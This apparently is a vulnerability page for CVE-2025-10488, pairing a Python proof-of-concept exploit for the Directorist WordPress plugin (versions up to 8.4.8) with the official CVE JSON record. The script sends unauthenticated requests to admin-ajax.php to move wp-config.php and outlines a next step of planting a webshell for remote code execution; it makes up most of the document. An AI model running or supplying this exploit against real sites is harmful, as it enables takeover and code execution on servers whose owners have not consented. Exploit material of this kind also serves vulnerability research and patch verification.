CVE-2025-10488

import requests import sys # CVE-2025-10488 PoC - Directorist Plugin Arbitrary File Move # Target: WordPress site with Directorist plugin <= 8.4.8 def exploit_file_move(target_url, source_file, dest_file): """ Exploit the arbitrary file move vulnerability in Directorist plugin Args: target_url: Base URL of the WordPress site source_file: File path to move (e.g., /path/to/wp-config.php) dest_file: Destination path (e.g., /path/to/wp-config.php.bak) """ # Target the AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request data = { 'action': 'add_listing_action', 'listing_csv': '', 'file_path': source_file, 'destination_path': dest_file } print(f"[*] Target: {target_url}") print(f"[*] Moving file: {source_file} -> {dest_file}") try: # Send the exploit request response = requests.post(ajax_url, data=data, timeout=30) if response.status_code == 200: print("[+] Request sent successfully") print(f"[*] Response: {response.text[:500]}") else: print(f"[!] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") def move_wpconfig_for_rce(target_url): """ Move wp-config.php to enable RCE Step 1: Backup original config Step 2: Create malicious config with webshell """ print("\n[*] Exploiting for RCE via wp-config.php manipulation") # Step 1: Move original wp-config.php exploit_file_move( target_url, '/var/www/html/wp-config.php', '/var/www/html/wp-config.php.bak' ) # Step 2: Move a file with webshell to wp-config.php # This would require additional file upload functionality print("\n[*] Next step: Upload webshell and move to wp-config.php") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') # Basic file move exploit exploit_file_move( target, '/var/www/html/wp-config.php', '/var/www/html/wp-config.php.bak' )

{"cve": {"id": "CVE-2025-10488", "sourceIdentifier": "[email protected]", "published": "2025-10-25T07:15:37.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to arbitrary file move due to insufficient file path validation in the add_listing_action AJAX action in all versions up to, and including, 8.4.8. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/directorist/tags/8.4.5/includes/classes/class-add-listing.php#L634", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3377181%40directorist&new=3377181%40directorist&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2249ef72-9955-4636-b32f-e88720923268?source=cve", "source": "[email protected]"}]}}